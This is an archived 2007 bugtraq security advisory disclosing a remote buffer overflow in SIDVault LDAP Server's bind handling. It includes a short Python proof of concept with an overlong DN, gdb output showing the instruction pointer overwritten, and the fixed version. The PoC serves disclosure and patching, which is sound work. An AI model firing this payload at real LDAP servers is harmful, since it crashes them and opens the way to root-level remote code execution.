bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: SIDVault LDAP Server Remote Buffer Overflow

SIDVault LDAP Server Remote Buffer Overflow

From: Joxean Koret <joxeankoret_at_nospam>
Date: Sun Aug 26 2007 - 00:50:11 GMT
To: Full Disclosure <full-disclosure@lists.grok.org.uk>, Security Tracker <bugs@securitytracker.com>, bugtraq@securityfocus.com


SIDVault LDAP Server Remote Buffer Overflow


Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and installations with high performance LDAP v3 server. It supports any number of schemas, easy to add/modify existing schemas, integrated web based user access, and fast browser based administration tools. Supports all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.

Vulnerable versions: Win32 2.0e Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute arbitrary code with root or SYSTEM-level privileges depending on the operative system target. Failed exploit attempts will result in a denial-of-service condition.

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256) $ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1226736720 (LWP 5942)] 0x41414141 in ?? ()
(gdb) where

#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
(...)

Quit
(gdb) i r
eax 0x8202c48 136326216 ecx 0x0 0 edx 0xb6e164df -1226742561 ebx 0x41414141 1094795585 esp 0xb6e16500 0xb6e16500 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind and professional.

Disclaimer:

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es

                



LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com